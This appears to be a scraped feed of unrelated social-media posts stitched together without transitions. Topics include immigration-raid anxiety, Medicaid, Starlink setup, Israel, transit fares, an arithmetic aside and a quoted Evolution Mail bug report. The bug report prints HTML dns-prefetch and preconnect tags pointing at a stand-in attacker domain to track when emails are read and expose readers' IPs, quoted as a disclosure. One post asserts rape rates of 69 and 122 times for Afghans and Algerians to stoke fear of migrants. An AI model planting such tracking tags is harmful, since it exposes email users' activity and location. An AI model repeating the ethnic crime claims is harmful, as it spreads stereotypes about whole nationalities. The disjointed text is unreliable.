I've been forcing myself to get out and do things but I'm not sure it's the best idea.

I went to get the car washed the other day and I wanted to jump out of the car and hug and apologize to the poor woman working there. To work a survival job like that on her feet all day **and** have to fear being hauled off for no good reason other than the color of her skin?

Today I stopped at a roadside stand on my way home and almost started crying in the store because again having to watch hard working people go about a survival level job while in fear of ......

ugh
what the ever loving hell have we become?

In Sweden, as of 2025, 63.1% of all rape and attempted rape convictions are linked to individuals with a migrant background — first or second generation.

And it gets worse.

As Ellie Hodges exposed:
Afghan Muslims commit rape at 69 times the rate of native Swedes.
Algerians? 122 times more.

Let that sink in.

Is this the “diversity” you were promised?

Or is it the destruction of Western safety, culture, and truth?

If you take 1 + 2 + 3 + 4 + 5 + ... x - 3 + x - 2 + x - 1 + x

And you make a table it looks like a quadratic formula

Now if you make a graph of each part you add it looks like a triamgle made out of rectangles

Now you could increase by smaller and smaller steps each time

And eventually with enough calculus you could find out that a right angle triangle that fits half a rectangle has the same area as half of that rectangle which you already knew

But you could make it really complicated

It’s a laughable statement for anyone who can do some basic math: so apparently 10% of Americans are “able-bodied on Medicaid”? Really? 1 in 10 of all the people you know in your community, your neighbourhood, are “able-bodied on Medicaid”? The level of ignorance or gullibility required for them to be able to get away with saying things like that is astonishing.

Evolution Mail Users Easily Trackable With HTML Despite Remote Content Loading Disabled

"if a HTML email contains a tag like:
<link rel="dns-prefetch" href="https://trackingcode.attackersdomain.example.com">
Then when an email is opened in Evolution Mail, a DNS request for trackingcode.attackersdomain.example.com is performed. This happens with remote content disabled, and without clicking the button to fetch it. The sender can look at their DNS logs to see if you’ve read your email, and the IP address of your DNS resolver at that time, which may indicate your location.
a different but similar bug:
<link href="trackingcode.attackersdomain.example.com" rel="preconnect">
This apparently triggers a connection when you read an email, even without clicking to load remote content. An attacker could look at the SNI header during the TLS negotiation to identify the unique reader of such an email, and it would grant them their IP address."

@Faelyn no it just sits out there year round. I might bring it in if there was going to be a hurricane. maybe. I have it 3' off the ground on an upended 300 gallon tub, and there's no risk of it becoming submerged. It has a built in heater for the winter. you can also tell it to "stow" which makes it vertical, so that could protect it a bit too. I need to put mine on a pole. so even in a bad storm it'd still be out there.

luckily they're cheaper now than when i got mine, and smaller.

Thanks so much for the "real life" info. I wanted to get a Starlink dish to use at home but looking at it, I thought, is this thing weather proof and works in storms? Mine would need to be stationed outside on a pole as well.

I will have to look into this and see what installation entails. A Starlink chain comes right over my house. If I'm outside, sometimes I will see it, it will light up because of all the flying planes after dark.

in reply to Faelyn

@Faelyn well, i have the second iteration, the large rectangular dish that can aim itself. So it came in a box with a Power supply, "router", dish, and a 30' cable or something. So you just plug the router in, put the dish outside, connect the cables and power supply up (they're gasketed plugs that look like usb-c for the dish, and NEMA 13(i think, like a computer plug) gasketed for the router. Connect to the router via wifi on yer phone with the starlink app, and then it just goes

Israel, through Netanyahu, his fascist collaborators, and a host of enablers (hello Canada and your national broadcaster, CBC), has turned itself from a tenuous oasis for the oppressed into a textbook humanitarian disgrace.

These are inexcusable offences against Jews and Judaism as much as they are against Palestinians.

The perpetrator's first crime is always against himself and his own humanity.

After seeing this thread I was curious and decided to compare fares between NYC and Istanbul. I was surprised NYC is basically single fare for everyone, seniors and disabled people pay half the fare.

In Istanbul seniors, disabled people, mothers with children under the age of 4, national athletes and more use public transit for free. Also students and teachers pay reduced fares. Also public transit is usually free on public holidays or other similar occasions. mastodon.social/@tess/11482400…

The thing about “able bodied” people on Medicaid is that most of them can’t work because they already do work, or are caretakers for family, or in fact are not able bodied at all and simply haven’t been able to navigate the disability system. They are mostly not young healthy people who can pick lettuce or harvest onions or weed fields in 100 degree heat.
